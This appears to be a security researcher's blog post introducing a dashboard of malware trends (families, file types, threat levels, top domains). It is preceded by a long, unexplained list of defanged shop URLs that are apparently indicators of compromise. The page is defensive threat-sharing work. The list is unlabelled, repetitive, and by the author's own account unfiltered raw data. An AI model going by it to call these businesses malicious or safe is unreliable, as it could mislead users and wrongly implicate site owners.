      URL: http://stonemanasia.]com/
      URL: http://stonemanasia.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://magescore.]com/
      URL: http://falcontraders.]co.]uk/
      URL: http://designbookshop.]in/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]mslzaric.]com/
      URL: http://www.]clairnewt.]com/
      URL: https://www.]denimvenim.]com/
      URL: http://www.]coslflybiod.]com/
      URL: http://www.]mirnkola.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://hotelcathedrale.]be/
      URL: https://www.]solaroutdoorlightingdisplay.]com/
      URL: http://www.]airckmoaw.]com/
      URL: http://doctor-alcrimea.]ru/
      URL: https://herbaloja.]online/
      URL: http://pharmatrades.]com/
      URL: http://www.]nadiarey.]com/
      URL: http://coitoys.]com/
      URL: http://oculosdahora.]com.]br/
      URL: http://om10.]ru/
      URL: http://www.]treosportswear.]com/
      URL: http://shopgbpi.]co.]uk/
      URL: https://www.]niwuma.]com/
      URL: http://www.]hoaquathanhhang.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]farmcraft.]at/
      URL: http://bookmyo.]com/
      URL: http://masterlyweft.]com/
      URL: http://store.]uggtasman.]com.]au/
      URL: http://www.]bukserhe.]com/
      URL: http://smallpenfactory.]com.]au/
      URL: http://www.]autocleaningbrunssum.]nl/
      URL: http://www.]laboutiqueachapeaux.]com/
      URL: http://batubati.]hu/
      URL: http://demolicaomoveis.]com.]br/
      URL: http://www.]superdin.]com.]br/
      URL: http://www.]tonyonlinestore.]com/
      URL: http://www.]descontosemhoteis.]com.]br/
      URL: http://garudakart.]com/
      URL: http://jutebazaar.]com/
      URL: http://www.]leilachodo.]com/
      URL: http://newstudytour.]com/
      URL: http://www.]zamarimarcondes.]com.]br/
      URL: http://fisiolifepilates.]com.]br/
      URL: https://dload.]com.]br/
      URL: http://hotelcathedrale.]be/
      URL: http://kiiroousa.]com/
      URL: http://designbookshop.]in/
      URL: http://hotelcathedrale.]be/
      URL: https://www.]baleyo.]com/
      URL: http://store.]uggtasman.]com.]au/
      URL: http://hotelcathedrale.]be/
      URL: http://oomph.]com.]sg/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]mywiperblades.]co.]uk/
      URL: http://www.]myengineoil.]co.]uk/
      URL: http://www.]britoil.]co.]uk/
      URL: http://www.]myvanaccessories.]co.]uk/
      URL: https://www.]ezy-care.]co.]uk/
      URL: http://english-furniture.]co.]uk/
      URL: http://hotelcathedrale.]be/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]matexbuyer.]com/
      URL: http://momega.]vn/
      URL: http://hotelcathedrale.]be/
      URL: http://hotelcathedrale.]be/
      URL: http://aquasport.]sigmacell.]in/
      URL: http://hotelcathedrale.]be/
      URL: http://worldstogether.]com/
      URL: http://www.]matexbuyer.]com/
      URL: https://www.]arenaflorist.]com/
      URL: http://www.]blendystraw.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://only16.]net/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]pibeauty.]com/~pibeauty/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]arquegym.]com.]br/
      URL: http://hotelcathedrale.]be/
      URL: http://momega.]vn/
      URL: http://hotelcathedrale.]be/
      URL: https://www.]paudicesrl.]it/
      URL: http://hotelcathedrale.]be/
      URL: http://hotelcathedrale.]be/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]reviewlista.]com/
      URL: https://www.]khadiindia.]in/
      URL: http://www.]kupu.]es/
      URL: http://hotelcathedrale.]be/
      URL: https://magesource.]su/
      URL: http://www.]nurserydecalsandmore.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://only16.]net/
      URL: http://www.]myvanaccessories.]co.]uk/
      URL: http://www.]mynumberplates.]com/
      URL: https://myphonetics.]com/
      URL: http://www.]myengineoil.]co.]uk/
      URL: http://www.]mywiperblades.]co.]uk/
      URL: http://www.]opticalsupplies.]com/
      URL: https://www.]ezy-care.]co.]uk/
      URL: http://www.]britoil.]co.]uk/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]doftec.]com/
      URL: http://garudakart.]com/
      URL: http://legalprintllc.]com/
      URL: http://lukasandlara.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://stonemanasia.]com/
      URL: http://stonemanasia.]com/
      URL: http://hotelcathedrale.]be/
      URL: https://myphonetics.]com/
      URL: http://alltradeshowdisplay.]com/
      URL: http://www.]virmans.]com/
      URL: http://www.]gramton.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://magescore.]com/
      URL: http://www.]thevintagegrapes.]com/
      URL: http://english-furniture.]co.]uk/
      URL: http://stonemanasia.]com/
      URL: http://jacksvapes.]com/
      URL: http://unsquashaball.]com/
      URL: https://www.]eyewear69.]my/
      URL: http://www.]vandrugboards.]com/
      URL: http://qandmantiqueluxury.]com/
      URL: http://hivepackaging.]com/
      URL: http://www.]4d-printology.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://diamondwrapfactory.]com/
      URL: http://petanyway.]net/index.%5Dphp/why-not-available/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]lobsters.]com.]sg/
      URL: https://www.]arenaflorist.]com/
      URL: http://www.]mrsflorist.]co.]in/
      URL: http://www.]loosen-up.]com/
      URL: http://labdooshoes.]com/
      URL: http://www.]pibeauty.]com/~pibeauty/
      URL: http://hotelcathedrale.]be/
      URL: https://www.]paudicesrl.]it/
      URL: http://hotelcathedrale.]be/
      URL: http://eshop.]wengthyelot54.]com/
      URL: https://mustardoc.]com/
      URL: http://hotelcathedrale.]be/
      URL: https://electroshopnow.]com/
      URL: http://kmmachinery.]com/
      URL: http://kmglasstools.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://dealelement.]com/
      URL: http://www.]matexbuyer.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]xentogo.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://shoefactoryindia.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://solarinfrasystems.]com/
      URL: https://electroshopnow.]com/
      URL: https://www.]macroman.]in/
      URL: http://juwelier-tarasek.]de/
      URL: https://dourosoptika.]gr/
      URL: https://www.]straightfromfarmers.]com.]au/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]uiterkits.]com/
      URL: http://de-lices.]ru/
      URL: http://hotelcathedrale.]be/
      URL: http://store.]uggtasman.]com.]au/
      URL: http://hotelcathedrale.]be/
      URL: http://rpkorea.]com/
      URL: https://www.]sellsspares.]com/
      URL: http://www.]fashionaxe.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://hotelcathedrale.]be/
      URL: http://hotelcathedrale.]be/
      URL: http://fenxiangheaven.]com/
      URL: http://www.]i91cloud.]com/
      URL: https://www.]ikonmotorsports.]com/
      URL: https://gorusticx.]com/
      URL: http://www.]lobsters.]com.]sg/
      URL: http://www.]ororganicliving.]com/
      URL: http://www.]lifestylea-list.]com/
      URL: http://www.]grovz.]com/
      URL: http://diamondwrapfactory.]com/
      URL: http://omniscrubs.]com/
      URL: http://www.]4d-printology.]com/
      URL: http://www.]northhillco.]com/
      URL: http://devdantona.]com/
      URL: http://deeprosso.]com/
      URL: http://www.]fashionaxe.]com/
      URL: http://www.]iousi.]com.]cn/
      URL: http://hotelcathedrale.]be/
      URL: https://kolcraft-staging.]gianthatworks.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://only16.]net/
      URL: http://www.]eurekacosmetics.]com/
      URL: http://momega.]vn/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]virmanishop.]com/
      URL: http://goofballstuff.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://om10.]ru/
      URL: http://www.]nurserydecalsandmore.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]baudacarlota.]com.]br/index.%5Dphp
      URL: http://www.]baudacarlota.]com.]br/index.%5Dphp%7C
      URL: http://www.]baudacarlota.]com.]br/index.%5Dphp
      URL: http://www.]baudacarlota.]com.]br/index.%5Dphp%7C
      URL: http://hotelcathedrale.]be/
      URL: https://www.]ikonmotorsports.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]cityflorist.]co.]in/
      URL: http://www.]webshopsmagento.]nl/
      URL: http://hotelcathedrale.]be/
      URL: http://goldwithyou.]com/
      URL: http://hotelcathedrale.]be/
      URL: https://herbaloja.]online/
      URL: http://www.]surprise.]ps/
      URL: http://hotelcathedrale.]be/
      URL: http://store.]curiousinventor.]com/
      URL: http://www.]magento.]flyermonster.]de/
      URL: http://hotelcathedrale.]be/
      URL: https://deals4kart.]com/
      URL: http://academycreative.]cz/
      URL: http://www.]webshopsmagento.]nl/
      URL: http://hotelcathedrale.]be/
      URL: http://cuberra.]eu/
      URL: http://hotelcathedrale.]be/
      URL: https://www.]smclinic.]bg/
      URL: http://shoefactoryindia.]com/
      URL: http://www.]fiskrose.]com/
      URL: https://myworldphone.]com/
      URL: https://www.]khadiindia.]in/
      URL: http://www.]kevinbuou.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]ajshoes.]top/index.%5Dphp?route=checkout/checkout
      URL: https://deals4kart.]com/
      URL: http://www.]fangshicube.]com/
      URL: http://www.]gpmbv.]com/
      URL: http://va-store.]de/
      URL: http://www.]webshopsmagento.]nl/
      URL: http://jewelsofdesert.]com/
      URL: http://www.]khadioutlet.]com/
      URL: http://lequeens.]com/
      URL: http://stilprinzessin.]com/
      URL: http://www.]doreall.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]webshopsmagento.]nl/
      URL: http://hotelcathedrale.]be/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]fangshicube.]com/
      URL: http://luggagemama.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://hotelcathedrale.]be/
      URL: http://cyprusitstore.]com/
      URL: https://deals4kart.]com/
      URL: http://www.]webshopsmagento.]nl/
      URL: http://hotelcathedrale.]be/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]ajshoes.]top/index.%5Dphp?route=checkout/checkout
      URL: http://hotelcathedrale.]be/
      URL: http://www.]myvanaccessories.]co.]uk/
      URL: http://www.]arquegym.]com.]br/
      URL: http://www.]britoil.]co.]uk/
      URL: http://hotelcathedrale.]be/
      URL: https://www.]chirobuddy.]net/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]electricalswholesale.]co.]uk/
      URL: http://www.]matexbuyer.]com/
      URL: http://www.]webshopsmagento.]nl/
      URL: https://www.]straightfromfarmers.]com.]au/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]doreall.]com/
      URL: https://pinkime.]com/
      URL: https://www.]websun.]us/
      URL: http://hotelcathedrale.]be/
      URL: http://hotelcathedrale.]be/
      URL: http://hotelcathedrale.]be/
      URL: http://hotelcathedrale.]be/
      URL: http://store.]curiousinventor.]com/guides/Surface_Mount_Soldering/Tools
      URL: http://www.]electricalswholesale.]co.]uk/
      URL: http://momega.]vn/
      URL: http://hotelcathedrale.]be/
      URL: http://magesource.]su/
      URL: http://magesource.]su/
      URL: http://magesource.]su/
      URL: http://only16.]net/
      URL: http://labdooshoes.]com/
      URL: http://www.]webshopsmagento.]nl/
      URL: http://hotelcathedrale.]be/
      URL: http://om10.]ru/
      URL: http://lequeens.]com/
      URL: http://www.]athleticmmagear.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://hotelcathedrale.]be/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]almosauto.]in/
      URL: http://douspeakgreen.]in/
      URL: http://www.]eurekacosmetics.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://coripa.]net/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]tribalasia.]com.]my/
      URL: http://hotelcathedrale.]be/
      URL: https://www.]xinginroo.]com/
      URL: http://magesource.]su/
      URL: https://www.]khadiindia.]in/
      URL: http://www.]supritam.]com/
      URL: http://magesource.]su/
      URL: http://store.]curiousinventor.]com/
      URL: http://www.]blendystraw.]com/
      URL: http://www.]barcoderfidstore.]com/
      URL: http://douspeakgreen.]in/
      URL: http://fashionfromla.]com/
      URL: http://seasonallivingokc.]com/
      URL: http://floorzndoorz.]com/
      URL: http://formula-depot.]com/
      URL: http://zigoh.]com/
      URL: https://www.]baleyo.]com/
      URL: http://luggagemama.]com/
      URL: http://magesource.]su/
      URL: http://hotelcathedrale.]be/
      URL: http://emediks.]com/store/
      URL: http://www.]fashionaxe.]com/
      URL: http://schrikdraad.]nu/
      URL: http://www.]liquidfillingpastefilling.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://bymatty.]com/
      URL: http://www.]sclabrine.]com/
      URL: https://www.]bluecactus.]co/
      URL: http://fashionavenue.]ma/
      URL: http://yesforlov.]sk/
      URL: https://vytunuj.]sk/
      URL: http://www.]nflskjor.]com/
      URL: http://www.]acolortree.]com/
      URL: https://cobrafashions.]com/
      URL: http://www.]wondershop.]in/
      URL: http://sockitupsocks.]com/
      URL: http://richbumlife.]com/
      URL: http://gypsygfashionaccessories.]com/
      URL: https://www.]bvsecurity.]com/
      URL: http://www.]fiskrose.]com/
      URL: https://espacomanix.]com.]br/
      URL: http://www.]nixim3dpuzzle.]com/
      URL: http://www.]almosauto.]in/
      URL: http://www.]mage-apps.]de/
      URL: http://budstok.]com.]ua/
      URL: http://stage.]citizencashmere.]com/
      URL: http://www.]nitazdesign.]com/
      URL: http://goldwithyou.]com/
      URL: http://chkmaid.]com/
      URL: http://www.]mattiaus.]com/
      URL: http://www.]hcgsci.]com/
      URL: http://eshop.]wengthyelot54.]com/
      URL: http://bartonwest.]com/
      URL: http://gravurator.]de/
      URL: http://platz.]com.]ua/
      URL: https://5eboard.]com/
      URL: http://khadder.]in/
      URL: https://novnation.]com/
      URL: https://www.]taptye.]com/
      URL: https://seelar.]com/
      URL: http://www.]1quickcomp.]com/
      URL: http://pinul.]com/
      URL: http://www.]99materials.]com/
      URL: http://southernvapor.]com/
      URL: http://www.]pejenterprisesinc.]com/
      URL: http://www.]ejoyeeta.]com/
      URL: http://www.]retailsigningsolutions.]com/
      URL: http://www.]fyringe.]com/
      URL: http://www.]suninbox.]co.]uk/
      URL: http://www.]gohoyo.]com/
      URL: http://eveday.]com/
      URL: https://www.]el-taller.]pe/
      URL: https://www.]dazzstyle.]com/
      URL: http://montecitocaviar.]com/
      URL: http://www.]togotelecom.]ca/
      URL: http://swimresearch.]com/
      URL: https://eighteditions.]com/
      URL: https://srmall.]net/
      URL: https://hyperstrength.]com/
      URL: https://www.]gardenarteu.]com/
      URL: http://deltanineclothing.]com/
      URL: http://www.]storerab.]com/
      URL: http://floorzndoorz.]com/
      URL: http://4girlsaccessories.]com/
      URL: http://www.]cityflorist.]co.]in/
      URL: http://faithandflags.]com/
      URL: https://www.]theaugustco.]com/
      URL: http://francomotorsports.]com/
      URL: http://www.]reviewlista.]com/
      URL: http://www.]luckystarparty.]com/
      URL: http://www.]interprice.]mx/
      URL: http://www.]xxlgrip.]com/
      URL: http://avstamps.]com/
      URL: https://www.]baleyo.]com/
      URL: http://www.]905wood.]com/
      URL: https://www.]macroman.]in/
      URL: http://cuberra.]eu/
      URL: https://www.]velmo.]com/
      URL: https://wonderna.]com/
      URL: http://www.]spectrumlites.]co.]in/
      URL: http://kupi-present.]ru/
      URL: http://plumbedright.]com/
      URL: http://equibuy.]es/
      URL: https://www.]tec-heads.]com/
      URL: http://advancehealthproducts.]com.]au/
      URL: http://www.]inflatable-zone.]org/
      URL: https://dermagold.]sg/
      URL: http://www.]ibericos.]es/
      URL: http://worldstogether.]com/
      URL: http://www.]reflect-store.]com/
      URL: http://www.]kaajalsarees.]com/
      URL: http://www.]arquegym.]com.]br/
      URL: http://www.]benzin-im-blut.]com/
      URL: http://www.]ladago.]co.]uk/
      URL: http://clonadipet.]com.]br/
      URL: http://www.]louboutinuk.]co.]uk/
      URL: https://onestophairandbeauty.]ie/
      URL: http://www.]jensalwholesale.]com/
      URL: https://www.]chirobuddy.]net/
      URL: http://tile.]tilesandiego.]com/
      URL: https://morrio.]com/
      URL: http://cadresrobain.]fr/
      URL: http://www.]petzy.]com.]au/
      URL: http://www.]dysin.]com/
      URL: http://buyvipbaby.]com/login/
      URL: http://www.]olisano.]com/
      URL: http://www.]thevintagegrapes.]com/
      URL: http://www.]ludoville.]it/
      URL: http://zigoh.]com/
      URL: http://usacontainergroup.]com/
      URL: https://www.]clinicallearning.]com/index.%5Dphp/
      URL: http://www.]farmcraft.]at/
      URL: http://www.]poyood.]com/
      URL: http://euromigracija.]lt/
      URL: http://goofballstuff.]com/
      URL: https://www.]enlivenglobal.]com/
      URL: http://www.]turyagatea.]com/
      URL: http://creekfire.]com/
      URL: http://nowknow.]ch/
      URL: http://vkconline.]com/
      URL: https://trinitysurvival.]com/
      URL: http://www.]eboxim.]com/
      URL: http://www.]ilovedelfruito.]com/
      URL: http://www.]danatsouq.]com/
      URL: https://www.]callidae.]com/
      URL: https://www.]tramit.]it/
      URL: http://jjnc.]com.]hk/
      URL: http://shop.]taketime.]ch/
      URL: https://lacnehry.]sk/
      URL: https://ibercorte.]com/
      URL: http://www.]macmax.]com/uk/
      URL: http://www.]raquelrecargas.]com.]br/
      URL: http://www.]hotsca.]com/
      URL: http://www.]jarab.]london/
      URL: http://www.]webshopsmagento.]nl/
      URL: http://start-finish.]ru/
      URL: http://www.]officiel.]it/
      URL: http://www.]isbbookstore.]com/
      URL: http://www.]krirob.]nu/
      URL: http://www.]eurekacosmetics.]com/
      URL: http://kupu.]es/
      URL: http://en.]lileauxbrocantes.]com/nouveautes.%5Dhtml
      URL: http://girlsandpearls.]com/
      URL: https://www.]websun.]us/
      URL: http://www.]vintageindiarishikesh.]com/
      URL: http://piese-gm.]ro/
      URL: http://www.]diamondsnyou.]com/
      URL: http://ccgobuy.]com/
      URL: http://olenobra.]com/
      URL: https://www.]eternis.]pt/
      URL: http://infcollection.]com/
      URL: http://lojamundodosgames.]com/
      URL: http://purplebluepublishing.]com/
      URL: https://www.]autowheelexperts.]com/
      URL: https://www.]gizell.]ro/
      URL: http://smalldogsdepot.]com/
      URL: http://www.]hessiansantasacks.]co.]uk/
      URL: http://laborisfarma.]pl/
      URL: http://fashionfromla.]com/
      URL: https://www.]sellsspares.]com/
      URL: http://www.]soothnshine.]com/
      URL: http://jacksvapes.]com/
      URL: https://www.]richgromart.]com/
      URL: http://www.]safetreksales.]com/
      URL: http://ibundo.]de/
      URL: http://www.]megamojster.]si/
      URL: http://rpkorea.]com/
      URL: http://discountadda.]com/
      URL: http://www.]enotecaosteriaroma.]it/
      URL: http://nopainnomusa.]com/
      URL: https://www.]shopforsaundarya.]com/
      URL: http://accessoriesdeluxe.]com/
      URL: https://www.]krausjeans.]com/
      URL: http://www.]ghulamali.]com.]pk/
      URL: http://www.]hardshot.]fr/
      URL: http://countrystorecampinas.]com.]br/
      URL: http://p-d-r.]ru/
      URL: http://demo.]freelunchlabs.]com/
      URL: http://atopmall.]kr/
      URL: http://hurtsilvermagic.]pl/customer/account/login/
      URL: https://www.]afsr-simivalley-shop.]com/
      URL: http://www.]dutwsnmare.]com/
      URL: http://produtosprofissionais.]com.]br/
      URL: https://my.]nutis.]com/
      URL: https://www.]smclinic.]bg/
      URL: https://www.]wisesolutions.]net/
      URL: https://davillblinds.]com/
      URL: https://minervamedical.]ca/
      URL: http://gamsjaga.]com/
      URL: https://jceracing.]com/
      URL: http://dhyanaa.]com/
      URL: https://weloveheipoa.]com/
      URL: http://www.]advanced-pixel-shuttle.]com/
      URL: http://allright.]dp.]ua/
      URL: http://trueitglobal.]com/
      URL: http://www.]nandndesign.]com/
      URL: http://antaraxnm.]com/
      URL: http://www.]petitkreativ.]at/
      URL: https://www.]crowngroup.]net.]au/shop/
      URL: http://vanquish.]co.]in/
      URL: http://www.]esde.]ro/
      URL: https://liquidlightglows.]com/
      URL: http://shop.]littleashford.]co.]za/
      URL: https://lens4us.]com/
      URL: https://www.]westernelitejewelry.]com/
      URL: http://www.]mobilprices.]com/
      URL: http://blitarzoneid.]blogspot.]com/
      URL: http://kraftitude.]com/
      URL: http://grupocyber.]net/
      URL: http://elektro-wols.]kompass-media.]eu/
      URL: http://classico.]nextmp.]net/
      URL: http://www.]nationaltiledistribution.]com/
      URL: http://bloomingtrails.]com/
      URL: http://redcellmedical.]com/
      URL: http://patesting.]ie/
      URL: http://www.]bysicilia.]it/
      URL: http://kibellariding.]com/
      URL: https://www.]ladoudounesolde.]com/
      URL: http://www.]anjelskedarceky.]sk/
      URL: https://poolstore.]com.]au/
      URL: http://sklepsilvermagic.]pl/
      URL: http://www.]uebuys.]com/
      URL: http://www.]reynsaon.]com/
      URL: http://eshop.]javwireless.]com/
      URL: http://alphafxtestbooster.]com/
      URL: https://decor-boutique.]com/
      URL: http://www.]kevinbuou.]com/
      URL: https://www.]aioma.]it/
      URL: http://luxuryjewelleryto.]com/
      URL: http://www.]angcoshop.]com/
      URL: https://www.]vayobv.]com/
      URL: http://de-lices.]ru/
      URL: https://democanopy.]com/
      URL: https://mustardoc.]com/
      URL: http://www.]gourmetgallery.]sk/
      URL: http://fetchscripts.]com/
      URL: http://ballcancersucks.]com/
      URL: https://xtremevisionhid.]com/
      URL: http://www.]brushncanvas.]com/
      URL: https://kolcraft-staging.]gianthatworks.]com/
      URL: http://www.]haitralled.]com/
      URL: https://hanarovendas.]com.]br/
      URL: http://www.]plasticrewards.]com/
      URL: http://www.]universalbumpkeys.]com/
      URL: http://zuzugadgets.]com/
      URL: https://freshyeat.]com/
      URL: http://alch.]it/
      URL: http://asap.]co.]in/
      URL: https://www.]majesticlightinginc.]com/
      URL: https://www.]1by1shop.]com/
      URL: https://www.]kitauto.]pt/
      URL: http://sandoggrus.]dk/
      URL: http://www.]shieldmans.]com/
      URL: http://zapal.]com.]ua/
      URL: https://www.]farmaciabovisa.]it/
      URL: http://gurmanebi.]com/
      URL: http://www.]sportlowcost.]it/
      URL: http://www.]minopuntomoda.]com/
      URL: http://mstech.]com.]au/
      URL: http://magegaga.]com/
      URL: http://www.]matexbuyer.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]pibeauty.]com/~pibeauty/
      URL: http://shop-camera.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://alltradeshowdisplay.]com/
      URL: http://hikvision-ir.]com/
      URL: http://shop-camera.]com/
      URL: http://homelykart.]com/
      URL: https://www.]bvsecurity.]com/
      URL: http://mebli-z.]com/
      URL: https://mustardoc.]com/
      URL: https://www.]krausjeans.]com/
      URL: http://www.]dutwsnmare.]com/
      URL: http://www.]gramton.]com/
      URL: http://usacontainergroup.]com/
      URL: http://tile.]tilesandiego.]com/
      URL: http://bartonwest.]com/
      URL: https://www.]dazzstyle.]com/
      URL: https://minervamedical.]ca/
      URL: http://www.]inflatable-zone.]org/
      URL: http://www.]ilovedelfruito.]com/
      URL: http://www.]hotsca.]com/
      URL: http://www.]uebuys.]com/
      URL: http://girlsandpearls.]com/
      URL: http://obeikandl.]com/
      URL: http://thanhloc1.]com/
      URL: http://seasonallivingokc.]com/
      URL: https://www.]macroman.]in/
      URL: https://www.]petremedies.]co.]uk/
      URL: http://www.]hessiansantasacks.]co.]uk/
      URL: http://naturagladlife.]com/
      URL: http://www.]protezzla-direct.]com/nkc-ledenvoordeel/
      URL: https://commercialpoolandspasupplies.]com/
      URL: http://www.]sclabrine.]com/
      URL: http://www.]quimex.]com.]ar/
      URL: http://lojamundodosgames.]com/
      URL: http://om10.]ru/
      URL: http://www.]webshopsmagento.]nl/
      URL: http://www.]suninbox.]co.]uk/
      URL: https://www.]vayobv.]com/
      URL: http://www.]louboutinuk.]co.]uk/
      URL: https://www.]ikonmotorsports.]com/
      URL: http://hotelcathedrale.]be/
      URL: https://www.]eternis.]pt/
      URL: http://www.]arquegym.]com.]br/
      URL: http://fetchscripts.]com/
      URL: http://petit-univers.]com/
      URL: https://www.]krausjeans.]com/
      URL: http://store.]uggtasman.]com.]au/
      URL: http://ledrus.]co.]nz/
      URL: http://obeikandl.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://net-istore.]ro/
      URL: http://www.]mrsflorist.]co.]in/
      URL: http://shop-camera.]com/

      Cyber Threat Trends Dashboard

      Introduction

      Information sharing is one of the most important activity that cybersecurity researchers do on daily basis. Thanks to “infosharing” activities it is possible to block or, in specific cases, to prevent cyber attacks. Most of the infosharing activities involved in cybersecurity are mostly focused on Indicator of Compromise such as: URL, IPs, Domains and file hashes which are perfectly used to arm protection tools such as: proxies, ng-firewalls and Antivirus Engines.

      Collecting and analyzing public available samples every single day I became more and more interested on the Cyber threats evolution (Cyber Threats Trend) rather than specific single analyses, which after hundreds of them, could get bored (no more emotion in analyzing the next Ransomware or a new Emotet version 😛 ). Regarding APT well it’s another cup of tea (a lot of passion in understanding next steps in there). So I decided to develop a super simple dashboard showing in real time (as soon as I get analyses done) the threat trends that are observed over days. The dashboard is available HERE (on top menu TOOLS => Cyber Threat Trends). So far only few basic information are showed, if you would like to see more stats/graph/infos, please feel free to contact me (HERE).

      Description

      Aim of this dashboard is to monitor trends over thousands even millions of samples providing quantitative analyses on what has observed during the performed automatic analyses. The data in this dashboard is totally auto-generated without control and with no post-processing. You should consider it as raw-data where you can start to elaborate your own research and eventually where you can apply your personal filters or considerations. If you do that, you should be aware that false positives could be behind the corner Let’s move on the current graphs and let’s try to explain what I’d like to show with them but before getting in you should be aware that all the digits on the graphs are expressing percentages and not absolute numbers. Now let’s dig a little bit on them.

      • Malware Families Trends. Detection distribution over time. In other words what are time-frames in where specific families are most active respect to others.
      • Malware Families. Automatic Yara rules classify samples into families. Many samples were not classified in terms of families, this happens when no signatures match the samples or if multiple family signatures match the same sample. In both ways I am not sure where the sample belong with, so it would be classified as “unknown” and not visualized on this graph. Missing slice of the cake is attributed to “unknown”.
      • Distribution Types. Based on the magic file bytes this graph would track the percentages of file types that Malware used as carrier.
      • Threat Level Distribution. From 0 to 3 is getting more and more dangerous. It would be interesting to understand the threat level of unknown families as well, in order to understand if hidden in unknown families Malware or false positives would hide. For such a reason a dedicated graph named Unknown Families Threat Level Distribution has created.
      • TOP domains, TOP processes and TOP File Names. With a sliding window of 300 last analyzed samples, the backend extracts the TOP (in terms of frequency) contacted domains, spawned processes and utilized file names. Again, there is no filter and no post-processing analysis in that fields, by meaning you could probably find as TOP domain “google.com” or “microsoft update”, which is fine, since if the sample queried them before performing its malicious intent, well, it is simply recorded and took to your attention. Same cup of tea with processes and file names.Indeed those fields are include the term “involved” into their title, if something is involved it does not mean that it is malicious , but that it is accounted to be in a malicious chain.

      Conclusion

      The introduced dashboard is part of my cybersecurity community contribution as every free tool released on the “Tools” menu box. Cyber Threat Trends dynamically evolves over time and you might find it useful to ask questions about live statistics on cybersecurity threats. If you are a journalist or a cybsec passionate you might find some answers to trending questions to be elaborated over time.